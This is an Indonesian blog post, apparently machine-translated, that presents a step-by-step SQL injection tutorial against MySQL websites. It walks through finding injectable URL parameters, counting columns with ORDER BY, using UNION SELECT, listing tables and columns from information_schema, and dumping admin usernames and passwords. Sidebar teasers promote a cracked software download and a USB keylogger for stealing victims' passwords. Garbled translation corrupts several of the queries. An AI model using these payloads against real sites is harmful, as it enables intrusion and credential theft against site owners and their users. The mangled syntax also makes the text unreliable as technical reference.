Cara Hack dan keamanan Wapsite

-

Hacking terbagi dalam beberapa metode, disini saya akan menguras dari metode SQL Injection di MySQL Database :

Serangan SQL INjection adalah kode injeksi yang memanfaatkan lapisan database aplikasi. Ini yang paling sering adalah database MySQL, namun ada teknik untuk melakukan serangan ini di database lain seperti Oracle. Dalam tutorial ini say akan menunjukkan kepada Agan langkah-langkah untuk melakukan serangan pada Database MySQL.

Langkah 1 :

Saat menguji situs web untuk kerentanan SQL Injection, Agan perlu menemukan halaman yang terlihat seperti ini www.wapsite/page=1

atau
www.wapsite.com/id=5

Pada dasarnya situs perlu memiliki sebuah + maka angka atau string, namun paling sering berupa angka. setelah anda menemukan halaman seperti ini, kami menguji kerentanan dengna hanya memasukkan setelah nomor di url. sebagai contoh :

www.wapsite.com/page=1

jika database rentan, halaman akan memuntahkan kesalahan MySQL seperti;

Peringantan : mysql-num-rows(): argumen yang diberikan bukan sumber hasil MySQL yang valid di /home/wwwprof/public_html/readnews.php on line 29

jika halaman memuat seperti biasa maka database tidak rentan, dan website tersebut tidak rentan terhadap SQL Injection.

Langkah 2

Sekarang kita perlu menemukan jumlah kolom serikat dalam database. Kami melakukan ini dengna perintah "order bya" kami melakukan ini dengna mamasukkan "order by 1","order by 2"-' dan seterusnya sampai kami menerima kesalahan halaman. Sebagai contoh :

http://www.site.com/page=1 pesanan dengan 1-

jika kita menerima kesalahan MySQL lain di sini, berarti kita memiliki 4 kolom. Jika situs tersebut salah ketik "order by 9" maka kita akan memiliki 8 kolom. JIka ini tidak berhasi, bukan - setelah nomornya, ubah dengan /* karena keduanya adalah dua awalan dan jika satu bekerja, yang lain cendering tidak terlalu. Itu hanya tergantung pada cara databace dikonfigurasi untuk awalan yang digunakan.

Langkah 3

Kami sekarang akan menggunakan perintah "serikat" untuk menemukan kolom yang rentan. Jadi kita masuk setelah url, union all select (jumlah kolom)-,

misalnya
www.site.com/page=1 serikat semua pilih 1,2,3,4-

Inilah yang akan kita masukkan jika kita memiliki 4 kolom. ANda memiliki 7 kolom yang akan Anda masukkan,
serikat semua memilih 1,2,3,4,5,6,7 - Jika ini berhasil dilakukanm halaman harus menunjukkan beberapa nomor  di suatu tempat pada halaman, Mosalnya, 2 dan 3. ini kolom 2 dan 3 rentan.

Langkah 4

Kita sekarang perlu mencari versi database, nama dan user, kami melakukan ini dengna mengganti nomor kolom yang rentan dengan perintah berikut :

user ()
database ()
versi ()
atau jika ini tidak bekerja coba ...
@@ user
@@ version
@@ database

Misalnya url akan terlihat seperti :
www.site.com/page=1 union all select 1, user (), version (), 4-

Halaman yang dihasilkan kemudian akan menunjukkan pengguna database dan kemudian versi MySQL. Misalnya admin @ localhost dan MySQL 5.0.83.

Note : JIka versi 5 diatas dibaca untuk melakukan serangan, jika sudah 4 dibawah, anda harus melakukan kekerasan atau menebah nama tabel dankolom, program dapat digunakan untuk melakukan ini.

Langkah 5

pada langkah ini, tujuan ami adalah mencamtumkan semua nama tabel dalam database. Untuk melakukan ini kita masukkan perintah berikut setelah url.
UNIO SELECT 1, table_name,3,4 FROM information_schema.tables-

Ingat "table_name" masuk ke dalam kolom rentan yang Anda termukan sebelumnya. Jika perintah ini dimasukkan dengna benar, halaman harus menampulkan semua tabel di database, jadi carilah tabel yang berisi informasi berguna seperti kata sandi, jadi cari tabel admin atau tabel anggota atau pengguna

Langkah 6

Pada Langkah ini kami ingin mencamnutmkan semua nama kolom di database, untuk melakukan ini kita menggunakan perintah berikut :
union all selct 1.2. group _concat (column_name), 4 from information_schema.columns ehere table_schema = database () -

Perintah ini membuat halaman memilah-milah semua nama kolom di database.Jadi lagi, cari nama yang menarik seperti user, email dan password.

Langkah 7

Akhirnya kita perlu membuang data, jadi katakanlah kita ingin mendapatkan field "username" dan "pasword", dari tabel "admin" kita akan menggunakan perintah berikut,

union all select 1.2. group_ concat (username, 0x3a, password), 4 dari admin-

jadi urlnya akan terlihat seperti ini :
www.site.com/pag=1 union all select 1.2. grup_concat (username, 0x3a,password), 4 from admin-

disini perintah "concat" cocok dengan username dan password dari website.

Baca Juga : Ayo belajar Hacking + Aplikasi yang digunakan Hacker

Comments

Post a Comment

Popular posts from this blog

Download Vegas Pro 16 x64 Bit + Crack Full Versi | Vidio Editing

-
Image
Kategori : Software | Date : 21 December 2018 Update Sony Vegas Pro 16 mendukung native editing HD, 2K dan 4K XAVC Perusahaan Jerman Magix telah mengambil beberapa pengembangan software Sony, dari video dan sound editing. Software Vegas salah satu aplikasi untuk editing video dan audio. CARA INSTAL VEGAS PRO FULL VERSI Editing video 4K sampai 4096 x 4096 Vegas Pro 16 Edit FX Tiny Planet, Bezier Masking, AutoLooks, Magix eFX Audio. Tidak mendapat Vegas DVD Architect Vegas Pro 16 FX Tiny Planet, Bezier Masking, Autolooks, Magix eFX Audio, Boris FX Continuum, ProDat Vita Scene. Vegas Pro 16 365 FX Tiny Planet, Bezier Masking, AutoLookcs, Magix EFX Audio, Boris FX Continuum, ProdDat VitaScene, FX Home Hitfilm Ignite 360 Vegas Pro 16 Suite FX Bundle FX Home HitFilm Ignite, ProDat, Boris FX Sapphire, Tiny Planet, Bezier Masking, AutoLooks Features In addition to manual refresh to keep the storyboard in sync with the timeline, an
Read more

MAKALAH HAK MILIK DAN KEPEMILIKAN

-
Image
Kata Pengantar  Dengan menyebut nama Allah SWT yang Maha Pengasih lagi Maha Panyayang, Kami panjatkan puja dan puji syukur atas kehadirat-Nya, yang telah melimpahkan rahmat, hidayah, dan inayah-Nya kepada kami, sehingga kami dapat menyelesaikan makalah ilmiah tentang limbah dan manfaatnya untuk masyarakat.
Read more

Mencuri data, Paswoord, Informasi hanya bermodalkan Flashdisk

-
Image
Kita akan mengambil semua informasi penting data atau bahkan pasword seseorang hanya dengan bermodalkan Flashdisk. Emang bisa. .......!!! tentu saja bisa disini kita akan membuat flasdiks kita menjadi key logger. Apa itu Key Logger Keylogger merupakan software pencatat segala kegiatan komputer yang sudah terpasang mulai dari apa yang di buka gerakan keyboard keylogger sebuah tujua positif uantuk memantau seseorang dan keylogger juga bisa digunakan untuk kegiatan negarif antaranya memata-matai datu mencuri informasi dari korban. Cara Menjadikan Flasdiks menjadi Key Logger : Download File Shadow Keylogger dan simpan di Flashdisk Kemudian jalankan Shadow Keylogger Jika muncul kotal dialog meminta paswoord isikan saya itu untuk paswoord kita gunakan nanti jika sudah klik Options Agar tampilan Keylogger tidak mencurgakan maka anda harus merubah ikonnya Sesuaikan pengaturannya dengan gambar dibawah ini Kemudian klik browse... dan tentukan lokasi penyimpanan file hasil
Read more